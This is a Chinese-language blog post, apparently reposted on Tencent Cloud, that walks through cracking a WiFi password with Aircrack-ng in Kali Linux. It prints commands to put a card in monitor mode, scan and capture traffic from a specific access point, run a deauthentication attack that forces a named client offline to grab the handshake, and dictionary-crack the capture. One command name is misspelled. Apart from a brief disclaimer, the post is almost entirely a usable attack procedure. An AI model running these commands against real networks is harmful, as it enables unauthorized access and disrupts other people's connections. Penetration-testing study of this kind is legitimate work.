首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >近源渗透 | 使用Aircrack-ng破解wifi密码

近源渗透 | 使用Aircrack-ng破解wifi密码

作者头像
安全小王子
发布2022-12-11 10:50:07
发布2022-12-11 10:50:07
2.5K00
代码可运行
举报
文章被收录于专栏:betasecbetasec
运行总次数:0
代码可运行

声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。

本次实验是在vmware虚拟机中的kali系统下进行的,kali虚拟机中需要使用USB无线网卡RT3070

设置wlan为监听模式

代码语言:javascript
代码运行次数:0
运行
复制
airmon-ng start wlan0   #开启网卡wlan0监听模式
iwconfig                #查看网卡状态,发现wlan0mon,表示已开启成功

探测附近WiFi

代码语言:javascript
代码运行次数:0
运行
复制
airdump-ng wlan0mon
  • BSSID 代表路由器的MAC地址;
  • PWR 代表信号的强度,数值越大代表信息越强;
  • CH 代表信道;
  • ENC代表用的加密的方式;
  • AUTH 代表认证的方式;
  • ESSID是WIFI的名字;

监听路由

代码语言:javascript
代码运行次数:0
运行
复制
sudo airodump-ng -c 8 -w  /home/wifi  --bssid F0:16:28:21:FB:EA  wlan0mon
  • -c 信道数
  • -w cap存储路径
  • -bssid AP mac地址

对目标用户发起攻击使其掉线

对目标用户发起攻击使其掉线,wifi重连,获取一次握手数据包

代码语言:javascript
代码运行次数:0
运行
复制
aireplay-ng -0 5 -a F0:16:28:21:FB:EA -c 04:8C:9A:56:EB:BC wlan0mon
  • -0 5 攻击模式 攻击次数
  • -a AP mac地址
  • -c 用户的 mac地址

数据包重放破解wifi密码

代码语言:javascript
代码运行次数:0
运行
复制
aircrack-ng -w /home/pass.txt -b F0:16:28:21:FB:EA  /home/wifi-01.cap
  • -w 密码字典路径
  • -b AP mac地址
  • 上一步流量包路径
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-10-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 betasec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档